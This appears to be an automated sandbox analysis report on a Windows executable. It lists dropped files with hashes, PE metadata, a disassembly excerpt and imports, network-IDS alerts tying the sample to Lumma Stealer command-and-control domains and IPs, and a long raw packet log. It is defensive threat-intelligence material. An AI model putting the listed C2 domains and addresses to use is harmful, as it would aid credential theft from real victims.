                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):351232
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.880670586595911
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:AxSaRDycKASpgS6sdn3P7cS9ShRjReCl6zY5AOQ61oEY62XhT2+:AxLy2bzczcMSfjFOoU62XhT2+
                                                                                                                                                                                                                                                                                    MD5:725EA12718261F13FB96AC192729A2A4
                                                                                                                                                                                                                                                                                    SHA1:3B1B55ED462B4371B2CAA579C8ABBCC7C2809352
                                                                                                                                                                                                                                                                                    SHA-256:0C9283378097DF2F44A2BB0A7A43826E531DCD97CBB5505B53E1847D6868B088
                                                                                                                                                                                                                                                                                    SHA-512:9C90EC835F15CDAF9F7DB8D33EF1D062337384527BF9594387C6612C5ABEDDC9EDD4417A6B792523611AFF8CF76B82E06A60D006AD0BC14C13A3C606641630A7
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................................... ....@.. ....................................@.....................................O.......0...............................................................................................H...........Z.hxHw+..... ......................@....text...0........................... ..`.rsrc...0............P..............@..@.reloc...............X..............@..B.....................Z.............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.295993221842788
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:241fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+JFmBMZJh1VjR:n1/YCW2AoQ0NijFwMHrVV
                                                                                                                                                                                                                                                                                    MD5:97A9EDF90AB000801499F80F6F6D7711
                                                                                                                                                                                                                                                                                    SHA1:C828F0DD37EC82CA495A411C93DCD80D7A8868EC
                                                                                                                                                                                                                                                                                    SHA-256:90363B9290EDD2F56D183A2CDE46B0B3CDFAE10474792B4A30A7A7E61A7143E6
                                                                                                                                                                                                                                                                                    SHA-512:412AA8575532E8F5DA82130EB86583240B5D44FCF7A5769E2B714C9570FA38F24B9259B4E53727B030A10503A78A58C5191C368895C19723BD796C98CA03BAF3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...T...............................................................................................................................................................................................................................................................................................................................................,...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):23
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.5600289361122233
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:oWEMo6vvRya:oWEpKvD
                                                                                                                                                                                                                                                                                    MD5:198AA7622D86723F12D39AA38A10C97F
                                                                                                                                                                                                                                                                                    SHA1:B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
                                                                                                                                                                                                                                                                                    SHA-256:88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
                                                                                                                                                                                                                                                                                    SHA-512:8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:012340..1..2..3..4.....
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.565107840986821
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:RLg9duHgkE0Id8KUe9y:RLg9duAJdOe9y
                                                                                                                                                                                                                                                                                    MD5:8858CC3810613C64CBCE69191CA1CAAC
                                                                                                                                                                                                                                                                                    SHA1:70EFBBD9D3E139E3958B3232BD7702551C05E1A3
                                                                                                                                                                                                                                                                                    SHA-256:DEEF0F2AB50ED4267EF31B1C6D2D266DDC1D4F75D8B8BD8104D94ADA08B50485
                                                                                                                                                                                                                                                                                    SHA-512:25DFD0713A9BA1D3A4CF820142248E971998BFDFC6852E3806F3170703AAFED485098C6DC50EBABA83130E8E7C01914E18D692C5096D95E9DF726190449D86F1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:ERROR: The process "EpicGamesLauncher.exe" not found...
                                                                                                                                                                                                                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.2815970715940646
                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                    • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                    File name:UY9hUZn4CQ.exe
                                                                                                                                                                                                                                                                                    File size:101'888 bytes
                                                                                                                                                                                                                                                                                    MD5:206addac1b15931a5a6f35222eced8c8
                                                                                                                                                                                                                                                                                    SHA1:297f99ca521f8a6133c39ce32d4f6e096860a4b7
                                                                                                                                                                                                                                                                                    SHA256:b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112
                                                                                                                                                                                                                                                                                    SHA512:68586256c387891c637063143a13ff7c9aa81aba28f2f7519f272ee2c123d5d21f11f666324166403625226867ca7e93c58822fab6bc4308b98ae50179103879
                                                                                                                                                                                                                                                                                    SSDEEP:1536:/AQQNQdlseZ1ffEaEWbAub1bGb6bBbzgEMbbE8bWB7zdWmLVz6o587DSfZYnd8m:4QQidl1Pp9Lp6887OCd8m
                                                                                                                                                                                                                                                                                    TLSH:22A3B72ABCAB0A69DDA15DBC923C41CAF327D55D1F954BFB63D604682C029DC2FA1C13
                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h....J...J...J...J...J...K...J...K...J...K...J...K...J...K...J...JI..J...K...J...J...J...K...JRich...J........PE..d....*.f...
                                                                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                                    Entrypoint:0x1400131f0
                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                    Time Stamp:0x66F92A07 [Sun Sep 29 10:20:55 2024 UTC]
                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                    Import Hash:5a71cd95736a46b01adfe7028b8fdffb
                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                                                                    call 00007F5B6C8F75A0h
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                                                                    jmp 00007F5B6C8F6CC7h
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                                                                    dec ebp
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    mov ecx, edx
                                                                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                                                                                                                    call 00007F5B6C8F6E62h
                                                                                                                                                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                                                    inc ebp
                                                                                                                                                                                                                                                                                    mov ebx, dword ptr [eax]
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    mov ebx, edx
                                                                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                                                                    and ebx, FFFFFFF8h
                                                                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                                                                    mov ecx, ecx
                                                                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                                                                    test byte ptr [eax], 00000004h
                                                                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                                                                                                                    je 00007F5B6C8F6E65h
                                                                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                    dec ebp
                                                                                                                                                                                                                                                                                    arpl word ptr [eax+04h], dx
                                                                                                                                                                                                                                                                                    neg eax
                                                                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                                                                    add edx, ecx
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    arpl ax, cx
                                                                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                                                                    and edx, ecx
                                                                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                                                                    arpl bx, ax
                                                                                                                                                                                                                                                                                    dec edx
                                                                                                                                                                                                                                                                                    mov edx, dword ptr [eax+edx]
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                                                                                                                    test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                                                                                                                    je 00007F5B6C8F6E5Dh
                                                                                                                                                                                                                                                                                    movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                                                                                                                    and eax, FFFFFFF0h
                                                                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                                                                    add ecx, eax
                                                                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                                                                    xor ecx, edx
                                                                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                                                                    mov ecx, ecx
                                                                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                                                                    jmp 00007F5B6C8F67C6h
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    retn 0000h
                                                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    mov ebx, ecx
                                                                                                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                                                                                                    call dword ptr [00001E3Bh]
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    mov ecx, ebx
                                                                                                                                                                                                                                                                                    call dword ptr [00001E2Ah]
                                                                                                                                                                                                                                                                                    call dword ptr [00001E34h]
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    mov ecx, eax
                                                                                                                                                                                                                                                                                    mov edx, C0000409h
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    add esp, 20h
                                                                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                                                                    jmp dword ptr [00001E28h]
                                                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1830c0xf0.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x1e8.rsrc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1b0000x8a0.pdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d0000xb4.reloc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x167000x70.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x165c00x140.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x150000x358.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                    .text0x10000x1356f0x13600b415dcf6ddf0965a88c3e9fc56c2dd6eFalse0.3128780241935484data6.277764417859445IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .rdata0x150000x411a0x4200c4147349ee68a1e8d85e7e4557f302ffFalse0.44365530303030304data5.324411929678907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .data0x1a0000x9400x4001b17e6ae6e44a5ebf9bf25c217c0cc86False0.2060546875DOS executable (block device driver)2.70418253102352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .pdata0x1b0000x8a00xa004001028a68167c3252366c4534aabe4cFalse0.43515625data4.469770979422141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .rsrc0x1c0000x1e80x20011076f4cd92501eb5cdceca592d7760fFalse0.541015625data4.7644199514493595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .reloc0x1d0000xb40x200931a235e04d3184bfe6430d7dab45acaFalse0.3359375data2.386329255934609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                    RT_MANIFEST0x1c0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                    KERNEL32.dllSetConsoleTextAttribute, SetConsoleTitleA, GetStdHandle, Sleep, CreateThread, Beep, GetConsoleWindow, SetConsoleTitleW, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, CloseHandle, GetLastError, GetModuleHandleW, GetFileInformationByHandleEx, MultiByteToWideChar, WideCharToMultiByte, GetCurrentThreadId, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree
                                                                                                                                                                                                                                                                                    USER32.dllFindWindowA, ShowWindow, GetAsyncKeyState
                                                                                                                                                                                                                                                                                    MSVCP140.dll??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, _Query_perf_frequency, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Xout_of_range@std@@YAXPEBD@Z, ?_Winerror_map@std@@YAHH@Z, ?_Xlength_error@std@@YAXPEBD@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?_Syserror_map@std@@YAPEBDH@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, _Query_perf_counter
                                                                                                                                                                                                                                                                                    VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                                                                                                                                                                                                                                    VCRUNTIME140.dll__current_exception_context, __current_exception, memcmp, _CxxThrowException, __std_exception_copy, __std_exception_destroy, memcpy, __C_specific_handler, memset, __std_terminate, memmove
                                                                                                                                                                                                                                                                                    api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                                                                                                                                                                                                                                                                                    api-ms-win-crt-heap-l1-1-0.dllmalloc, _set_new_mode, _callnewh, free
                                                                                                                                                                                                                                                                                    api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                                                                                                                                                                                                    api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _crt_atexit, _initterm, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _seh_filter_exe, _initterm_e, exit, _exit, abort, __p___argc, _set_app_type, _invalid_parameter_noinfo_noreturn, __p___argv, _c_exit, system, terminate, _register_onexit_function, _register_thread_local_exe_atexit_callback, _cexit
                                                                                                                                                                                                                                                                                    api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_func, _configthreadlocale
                                                                                                                                                                                                                                                                                    SHELL32.dllShellExecuteW
                                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:16.577439+02002056172ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)1192.168.2.10620051.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:16.717882+02002056054ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)1192.168.2.10651841.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:16.779440+02002056040ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)1192.168.2.10497891.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:16.795527+02002056056ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)1192.168.2.10510441.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:16.889040+02002056036ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)1192.168.2.10624021.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:16.933938+02002056058ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)1192.168.2.10512911.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:17.496230+02002056046ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)1192.168.2.10585991.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:17.525474+02002056042ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)1192.168.2.10636521.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:17.581169+02002056052ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)1192.168.2.10495201.1.1.153UDP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:20.683051+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049719172.67.197.40443TCP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:20.683051+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049719172.67.197.40443TCP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:24.575237+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049726188.114.96.3443TCP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:24.575237+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049726188.114.96.3443TCP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:25.990274+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049728104.21.1.169443TCP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:25.990274+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049728104.21.1.169443TCP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:28.638282+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049733172.67.197.40443TCP
                                                                                                                                                                                                                                                                                    2024-09-30T18:20:28.638282+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049733172.67.197.40443TCP
                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.976337910 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.976381063 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:00.976438999 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.094594955 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.094626904 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.583569050 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.583687067 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.605937958 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.605964899 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.606434107 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.623099089 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.667397976 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.739964962 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740006924 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740036011 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740060091 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740067959 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740087986 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740117073 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740127087 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740578890 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740618944 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740628004 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740658045 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740664005 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740669966 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740710974 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.740885973 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.744781971 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.745183945 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.745197058 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:01.874531031 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.037817955 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.037878036 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.037904978 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.037928104 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.037935972 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.037967920 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.037977934 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.038018942 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.038026094 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.038033009 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.038074017 CEST49708443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.038074970 CEST44349708188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:02.038088083 CEST44349708188.114.97.3192.168.2.10
